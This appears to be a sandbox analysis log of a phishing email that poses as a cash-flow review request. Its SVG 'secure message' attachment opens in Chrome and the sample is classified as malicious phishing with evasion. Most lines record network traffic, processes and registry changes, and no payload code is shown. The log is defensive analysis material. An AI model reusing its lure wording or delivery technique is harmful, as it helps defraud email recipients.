              Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
              Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
              Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
              Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
              Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
              Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
              Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
              Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
              Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
              Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
              Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
              Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
              Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
              Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
              Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
              Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
              Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
              Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
              Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
              Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
              Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
              Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
              Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
              Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
              Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
              Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
              Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
              Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
              Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
              Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
              Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
              Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
              Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
              Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
              Source: unknownHTTPS traffic detected: 172.67.221.194:443 -> 192.168.2.17:49823 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.221.194:443 -> 192.168.2.17:49824 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.221.194:443 -> 192.168.2.17:49827 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.17:49846 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.17:49845 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.17:49852 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.16.6.189:443 -> 192.168.2.17:49858 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.80.100:443 -> 192.168.2.17:49866 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.196.11:443 -> 192.168.2.17:49903 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.92.165:443 -> 192.168.2.17:49917 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.221.194:443 -> 192.168.2.17:49932 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.17:49945 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 140.82.113.3:443 -> 192.168.2.17:49977 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.96:443 -> 192.168.2.17:49979 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.96:443 -> 192.168.2.17:49978 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.17:49988 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.96:443 -> 192.168.2.17:49993 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.96:443 -> 192.168.2.17:50004 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.17:50056 version: TLS 1.2
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir4500_654395151
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir4500_654395151
              Source: classification engineClassification label: mal100.phis.evad.winMSG@23/32@32/171
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20250324T1434440803-5876.etl
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.ini
              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\EXTERNAL Cash Flow Analysis Final Review Needed Before Submission.msg"
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "7779AF13-4480-4A6E-89EB-D436C599513A" "788ADFE0-12BE-4AF4-B40B-26DCFAAF58F4" "5876" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "7779AF13-4480-4A6E-89EB-D436C599513A" "788ADFE0-12BE-4AF4-B40B-26DCFAAF58F4" "5876" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\LVP5IGKL\NewSecureMessage.svg
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,11133686377390533759,9087752082049990880,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:3
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\LVP5IGKL\NewSecureMessage.svg
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,11133686377390533759,9087752082049990880,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:3
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InProcServer32
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DF717EAA4AD94EC9558499602D48DE5FBCF03A25 Blob
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
